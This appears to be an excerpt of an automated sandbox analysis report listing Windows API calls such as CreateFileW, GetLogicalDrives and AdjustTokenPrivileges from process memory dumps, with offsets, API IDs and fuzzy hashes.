                                                        • K32GetModuleInformation.KERNEL32(?,00000E9C,9B028BEA,00000000,00000000,00000000,00000000), ref: 01DFB0AE
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2103114209.0000000001DFA000.00000040.00000001.sdmp, Offset: 01DFA000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationModule
                                                        • String ID:
                                                        • API String ID: 3425974696-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2103114209.0000000001DFA000.00000040.00000001.sdmp, Offset: 01DFA000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleMode
                                                        • String ID:
                                                        • API String ID: 4145635619-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01DFAB1A
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2103114209.0000000001DFA000.00000040.00000001.sdmp, Offset: 01DFA000, based on PE: false
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetThreadUILanguage.KERNEL32(?), ref: 02841148
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2108123811.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageThread
                                                        • String ID:
                                                        • API String ID: 243849632-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • K32EnumProcessModules.KERNEL32(?,00000E9C,9B028BEA,00000000,00000000,00000000,00000000), ref: 01DFAFBE
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2103114209.0000000001DFA000.00000040.00000001.sdmp, Offset: 01DFA000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumModulesProcess
                                                        • String ID:
                                                        • API String ID: 1082081703-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ReadFile.KERNELBASE(?,00000E9C,9B028BEA,00000000,00000000,00000000,00000000), ref: 028408E5
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2108123811.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01DFBA7E
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2103114209.0000000001DFA000.00000040.00000001.sdmp, Offset: 01DFA000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0284132F
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2108123811.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: AttributeConsoleText
                                                        • String ID:
                                                        • API String ID: 646522457-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2103114209.0000000001DFA000.00000040.00000001.sdmp, Offset: 01DFA000, based on PE: false
                                                        Similarity
                                                        • API ID: Flags
                                                        • String ID:
                                                        • API String ID: 3401871038-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 02840640
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2108123811.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: FileUnmapView
                                                        • String ID:
                                                        • API String ID: 2564024751-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetSystemInfo.KERNELBASE(?), ref: 0284099C
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2108123811.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        • String ID:
                                                        • API String ID: 31276548-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01DFAB1A
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2103114209.0000000001DFA000.00000040.00000001.sdmp, Offset: 01DFA000, based on PE: false
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetConsoleOutputCP.KERNEL32 ref: 01DFAA71
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2103114209.0000000001DFA000.00000040.00000001.sdmp, Offset: 01DFA000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 3985236979-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetFileType.KERNELBASE(?,00000E9C,9B028BEA,00000000,00000000,00000000,00000000), ref: 02840819
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2108123811.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID:
                                                        • API String ID: 3081899298-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2108123811.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleWrite
                                                        • String ID:
                                                        • API String ID: 2657657451-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 01DFABC9
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2103114209.0000000001DFA000.00000040.00000001.sdmp, Offset: 01DFA000, based on PE: false
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID:
                                                        • API String ID: 999431828-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01DFBA7E
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2103114209.0000000001DFA000.00000040.00000001.sdmp, Offset: 01DFA000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 9f23523cb4c65bc2ec62a1d4721d0a9c834a0299fff3c6afdb729a70cb594144
                                                        • Instruction ID: 0ae1abee9e766ad3d1d3eff6d12c71e7d6e3f5da5877035baca9f3eaadba597b
                                                        • Opcode Fuzzy Hash: 9f23523cb4c65bc2ec62a1d4721d0a9c834a0299fff3c6afdb729a70cb594144
                                                        • Instruction Fuzzy Hash: 91118E72500700DFEB21CF55DC45B52FFE4EF18211F0884AEDE898A612D371E518DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleTitleW.KERNEL32(?), ref: 028401D0
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2108123811.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleTitle
                                                        • String ID:
                                                        • API String ID: 3358957663-0
                                                        • Opcode ID: de51fb1141aff10a9a4ba59b0fef464f7ec8a3468461a79525c960319e41b412
                                                        • Instruction ID: 0135dc31afd15ee67f741334c224aee2de0cef132c67b65c71fff15916b35a8a
                                                        • Opcode Fuzzy Hash: de51fb1141aff10a9a4ba59b0fef464f7ec8a3468461a79525c960319e41b412
                                                        • Instruction Fuzzy Hash: 13019E79604348CFEB14DF25DC857A6FBA8DF01225F08C4AADE09CB642EB74E404CA61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0284109E
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2108123811.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationVolume
                                                        • String ID:
                                                        • API String ID: 2039140958-0
                                                        • Opcode ID: 9ae414278d5c539fe650478d1061f9b03b80bc72272b509357bbd34e170f8eb7
                                                        • Instruction ID: b62daf1e71972d8513e357a303eda53abe3c1237fc3e4ba53d5461122765537e
                                                        • Opcode Fuzzy Hash: 9ae414278d5c539fe650478d1061f9b03b80bc72272b509357bbd34e170f8eb7
                                                        • Instruction Fuzzy Hash: 75017175900600AFE310DF16DC46B66FBA8FB84A20F14816AED089B741D235B515CBE5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 01DFA23E
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2103114209.0000000001DFA000.00000040.00000001.sdmp, Offset: 01DFA000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleCtrlHandler
                                                        • String ID:
                                                        • API String ID: 1513847179-0
                                                        • Opcode ID: b29fe05114220fd160884dccafe7d9acb7174076104b5ec5c813fe0ddec0704e
                                                        • Instruction ID: 629dc280de92a61b98f958ad1d7a79885ffb11e054cd70176fc6fef254bc1b20
                                                        • Opcode Fuzzy Hash: b29fe05114220fd160884dccafe7d9acb7174076104b5ec5c813fe0ddec0704e
                                                        • Instruction Fuzzy Hash: 07017175900600AFE310DF16DC46B66FBA8FB84A20F14816AED089B741D235B515CBE5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0284132F
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2108123811.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: AttributeConsoleText
                                                        • String ID:
                                                        • API String ID: 646522457-0
                                                        • Opcode ID: fd5d10e7b261f01b3073090b2b96c6b63f15ad5ef709e6f459869643fc024b73
                                                        • Instruction ID: 6a87f852ab360208328b1e7ffbb52f1fe567adfb8672ec565dbcf9c5ea2dbc59
                                                        • Opcode Fuzzy Hash: fd5d10e7b261f01b3073090b2b96c6b63f15ad5ef709e6f459869643fc024b73
                                                        • Instruction Fuzzy Hash: FC01BC79504304DFEF209F15DC89BA5FBA4EF05624F08C4AADC09CB642D679A444CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2103114209.0000000001DFA000.00000040.00000001.sdmp, Offset: 01DFA000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleMode
                                                        • String ID:
                                                        • API String ID: 4145635619-0
                                                        • Opcode ID: 61769e351ca8ef0f90d8324e63358221cc203d878b1861ec93407fda8593f05e
                                                        • Instruction ID: 91d8552f9de4130a5a2379fb1b4a26867950e49375c308d0c1a2800a123cbaf0
                                                        • Opcode Fuzzy Hash: 61769e351ca8ef0f90d8324e63358221cc203d878b1861ec93407fda8593f05e
                                                        • Instruction Fuzzy Hash: B001DF75500304DFEB21CF19DC85BA5FBA4EF05621F08C4AFDE498B256D275E904CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02840502
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2108123811.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: FolderPath
                                                        • String ID:
                                                        • API String ID: 1514166925-0
                                                        • Opcode ID: 0243d4d76db054490e1504edffce44c8f41bef04095be29f945d9ec241fa22d6
                                                        • Instruction ID: eefe17db209b0f423ae87d8a81baef4163c54fa4c88dc90b2d96c491ccc5c43d
                                                        • Opcode Fuzzy Hash: 0243d4d76db054490e1504edffce44c8f41bef04095be29f945d9ec241fa22d6
                                                        • Instruction Fuzzy Hash: B5016275900600ABD314DF16DC46B26FBA8FB89B20F14815AED085B741D275F515CBE6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetDriveTypeW.KERNELBASE(?), ref: 02840FB0
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2108123811.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: DriveType
                                                        • String ID:
                                                        • API String ID: 338552980-0
                                                        • Opcode ID: 4c38a78f8aa4792ba7ceb830ee17f3be668b7ed0a01e576b5d60254c4349749d
                                                        • Instruction ID: d66b1c002601a47ed9b7ad5f9d090b73337a8b46f6bcd46d7a5ead1dfc2151ef
                                                        • Opcode Fuzzy Hash: 4c38a78f8aa4792ba7ceb830ee17f3be668b7ed0a01e576b5d60254c4349749d
                                                        • Instruction Fuzzy Hash: A1017C79504348DFEB10DF15D885B66FB94EF00624F08C5AADD08CF686E778E408CAA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01DFA94A
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2103114209.0000000001DFA000.00000040.00000001.sdmp, Offset: 01DFA000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguagesPreferredThread
                                                        • String ID:
                                                        • API String ID: 842807343-0
                                                        • Opcode ID: f655413e5846fda2b666ad5dae28f4dc25227af5b6bc9296b0e5eff9cbe20533
                                                        • Instruction ID: f88e290e48ff0dd5e932df4a5a9c1e65cc0c50168afafb881777da92e6296c32
                                                        • Opcode Fuzzy Hash: f655413e5846fda2b666ad5dae28f4dc25227af5b6bc9296b0e5eff9cbe20533
                                                        • Instruction Fuzzy Hash: 26016275900600ABD314DF16DC46B26FBA8FB89B20F14815AED085B741D275F515CBE6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 02840640
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2108123811.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: FileUnmapView
                                                        • String ID:
                                                        • API String ID: 2564024751-0
                                                        • Opcode ID: 17097d18b259d21cff03edbac13c2d20301c7d9f6aba29f536cb25df262a07c7
                                                        • Instruction ID: f05a03f795ef5ea3d451204cb4216c0448a2ab1966bb33cfc4e994a2537a6a8f
                                                        • Opcode Fuzzy Hash: 17097d18b259d21cff03edbac13c2d20301c7d9f6aba29f536cb25df262a07c7
                                                        • Instruction Fuzzy Hash: 9301F47D500708DFEB148F15D885B62FBA4EF41625F08C0AADD0A8B752D774E408DAA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 01DFABC9
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2103114209.0000000001DFA000.00000040.00000001.sdmp, Offset: 01DFA000, based on PE: false
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID:
                                                        • API String ID: 999431828-0
                                                        • Opcode ID: cb209c0e3a268b490963dab957c41d089237ed5de3c915c0024b5b1f020c83b9
                                                        • Instruction ID: 9414aff44eafed2c391606dfcba39b64c730c7e3562b2761e5f9fea849a83abd
                                                        • Opcode Fuzzy Hash: cb209c0e3a268b490963dab957c41d089237ed5de3c915c0024b5b1f020c83b9
                                                        • Instruction Fuzzy Hash: E601DC79404344CFEB10DF59D889BA1FBA4EF04220F49C4AACE0C8F206D274A504CBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetThreadUILanguage.KERNEL32(?), ref: 02841148
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2108123811.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageThread
                                                        • String ID:
                                                        • API String ID: 243849632-0
                                                        • Opcode ID: d96baaafe028c12182204e78ede5b6327039ec9cdd11654019c6c395975da922
                                                        • Instruction ID: 479b964ef88e20119fbc5b5745a5fac11d8ca4367e942e0bdb09dd55769a24ee
                                                        • Opcode Fuzzy Hash: d96baaafe028c12182204e78ede5b6327039ec9cdd11654019c6c395975da922
                                                        • Instruction Fuzzy Hash: CAF0223D500748DFEB20CF05DC89B65FBA4EF01A21F08C0DACC0D8B312DA75A488CAA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetSystemInfo.KERNELBASE(?), ref: 0284099C
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2108123811.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        • String ID:
                                                        • API String ID: 31276548-0
                                                        • Opcode ID: 0a74f147d78fb82c3fb1a9b6d4c9d0f8bd9a0ba9e6bfeb33ba20e2babd92b271
                                                        • Instruction ID: 7888ae545335f26a0d79d69a98c6d0a12d139347bf9ffbe821385a8cd44d764e
                                                        • Opcode Fuzzy Hash: 0a74f147d78fb82c3fb1a9b6d4c9d0f8bd9a0ba9e6bfeb33ba20e2babd92b271
                                                        • Instruction Fuzzy Hash: AFF0C23D504748DFEB20DF15D889B66FFA0EF15726F08C09ADE498B316D775A408CAA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2103114209.0000000001DFA000.00000040.00000001.sdmp, Offset: 01DFA000, based on PE: false
                                                        Similarity
                                                        • API ID: Flags
                                                        • String ID:
                                                        • API String ID: 3401871038-0
                                                        • Opcode ID: 8fea6efb00d7c3b3653cadc5ee0dec95cb16f519c44227ef6663cbb7a81f3110
                                                        • Instruction ID: bbfc7b3dace462f6bdeed4cfed31472d615ddcb94089fbf54791bf8e5f74176a
                                                        • Opcode Fuzzy Hash: 8fea6efb00d7c3b3653cadc5ee0dec95cb16f519c44227ef6663cbb7a81f3110
                                                        • Instruction Fuzzy Hash: C4F0AF39504740DFEB219F45D885B65FBE0EF05621F08C09ADE4D4B312D3B5E508CAA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetConsoleOutputCP.KERNEL32 ref: 01DFAA71
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2103114209.0000000001DFA000.00000040.00000001.sdmp, Offset: 01DFA000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 3985236979-0
                                                        • Opcode ID: 3281545bc4601b973423cf48495d35af23d9880cd9a278f20eeacbade2936846
                                                        • Instruction ID: 7ffcf702c00067a300ef68fe73987fb397a92c29e17e0db716ab5f4d9f5031dc
                                                        • Opcode Fuzzy Hash: 3281545bc4601b973423cf48495d35af23d9880cd9a278f20eeacbade2936846
                                                        • Instruction Fuzzy Hash: 28F0CD35504744CFEB11CF09D989762FBA0EF09625F48C09ADE4D4F342D278E60CCAA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CloseHandle.KERNELBASE(?), ref: 01DFA9C8
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2103114209.0000000001DFA000.00000040.00000001.sdmp, Offset: 01DFA000, based on PE: false
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID:
                                                        • API String ID: 2962429428-0
                                                        • Opcode ID: b6b0be4c6e318d700720504d8f78c6f3dc1defdf30b1c7f67a3a5f0dba85fb51
                                                        • Instruction ID: 26b6a79ce213e318e80d1f3d6186c3b654120ce5c9f93fcac2b5eabf4ef594d4
                                                        • Opcode Fuzzy Hash: b6b0be4c6e318d700720504d8f78c6f3dc1defdf30b1c7f67a3a5f0dba85fb51
                                                        • Instruction Fuzzy Hash: A011A3755093809FD712CF25DC45B92FFA4EF46220F0980EFED498B253D275A908CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CloseHandle.KERNELBASE(?), ref: 01DFA9C8
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2103114209.0000000001DFA000.00000040.00000001.sdmp, Offset: 01DFA000, based on PE: false
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID:
                                                        • API String ID: 2962429428-0
                                                        • Opcode ID: 52439562c473d71a843e53a3059888c27e65f49590f14021e75519f7c695a7da
                                                        • Instruction ID: a3a50e132ed8f8917458b1f059a88b1c60a8ec699b8f21de4f72073f3b9e0360
                                                        • Opcode Fuzzy Hash: 52439562c473d71a843e53a3059888c27e65f49590f14021e75519f7c695a7da
                                                        • Instruction Fuzzy Hash: F501DF75500740DFEB11DF19D8857A6FB94EF04220F48C0AEDD098B242D275E908CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Executed Functions

                                                        APIs
                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01EDAD37
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2103637068.0000000001EDA000.00000040.00000001.sdmp, Offset: 01EDA000, based on PE: false
                                                        Similarity
                                                        • API ID: AdjustPrivilegesToken
                                                        • String ID:
                                                        • API String ID: 2874748243-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01EDAD37
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2103637068.0000000001EDA000.00000040.00000001.sdmp, Offset: 01EDA000, based on PE: false
                                                        Similarity
                                                        • API ID: AdjustPrivilegesToken
                                                        • String ID:
                                                        • API String ID: 2874748243-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01EDB329
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2103637068.0000000001EDA000.00000040.00000001.sdmp, Offset: 01EDA000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationQuerySystem
                                                        • String ID:
                                                        • API String ID: 3562636166-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01EDB329
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2103637068.0000000001EDA000.00000040.00000001.sdmp, Offset: 01EDA000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationQuerySystem
                                                        • String ID:
                                                        • API String ID: 3562636166-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleTitleW.KERNEL32(?), ref: 027701D0
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2109645927.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleTitle
                                                        • String ID:
                                                        • API String ID: 3358957663-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0277072D
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2109645927.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RegisterEventSourceW.ADVAPI32(?), ref: 02770DD6
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2109645927.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: EventRegisterSource
                                                        • String ID:
                                                        • API String ID: 1693822063-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • K32EnumProcessModules.KERNEL32(?,00000E9C,9B09C380,00000000,00000000,00000000,00000000), ref: 01EDAFBE
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2103637068.0000000001EDA000.00000040.00000001.sdmp, Offset: 01EDA000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumModulesProcess
                                                        • String ID:
                                                        • API String ID: 1082081703-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetTokenInformation.KERNELBASE(?,00000E9C,9B09C380,00000000,00000000,00000000,00000000), ref: 01EDBDBC
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2103637068.0000000001EDA000.00000040.00000001.sdmp, Offset: 01EDA000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationToken
                                                        • String ID:
                                                        • API String ID: 4114910276-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0277109E
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2109645927.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationVolume
                                                        • String ID:
                                                        • API String ID: 2039140958-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • K32GetModuleInformation.KERNEL32(?,00000E9C,9B09C380,00000000,00000000,00000000,00000000), ref: 01EDB0AE
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2103637068.0000000001EDA000.00000040.00000001.sdmp, Offset: 01EDA000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationModule
                                                        • String ID:
                                                        • API String ID: 3425974696-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetFileType.KERNELBASE(?,00000E9C,9B09C380,00000000,00000000,00000000,00000000), ref: 02770819
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2109645927.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID:
                                                        • API String ID: 3081899298-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 01EDA23E
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2103637068.0000000001EDA000.00000040.00000001.sdmp, Offset: 01EDA000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleCtrlHandler
                                                        • String ID:
                                                        • API String ID: 1513847179-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02770502
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2109645927.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: FolderPath
                                                        • String ID:
                                                        • API String ID: 1514166925-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0277072D
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2109645927.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ReadFile.KERNELBASE(?,00000E9C,9B09C380,00000000,00000000,00000000,00000000), ref: 027708E5
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2109645927.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01EDA94A
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2103637068.0000000001EDA000.00000040.00000001.sdmp, Offset: 01EDA000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguagesPreferredThread
                                                        • String ID:
                                                        • API String ID: 842807343-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RegisterEventSourceW.ADVAPI32(?), ref: 02770DD6
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2109645927.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: EventRegisterSource
                                                        • String ID:
                                                        • API String ID: 1693822063-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetTokenInformation.KERNELBASE(?,00000E9C,9B09C380,00000000,00000000,00000000,00000000), ref: 01EDBDBC
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2103637068.0000000001EDA000.00000040.00000001.sdmp, Offset: 01EDA000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationToken
                                                        • String ID:
                                                        • API String ID: 4114910276-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2109645927.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleWrite
                                                        • String ID:
                                                        • API String ID: 2657657451-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
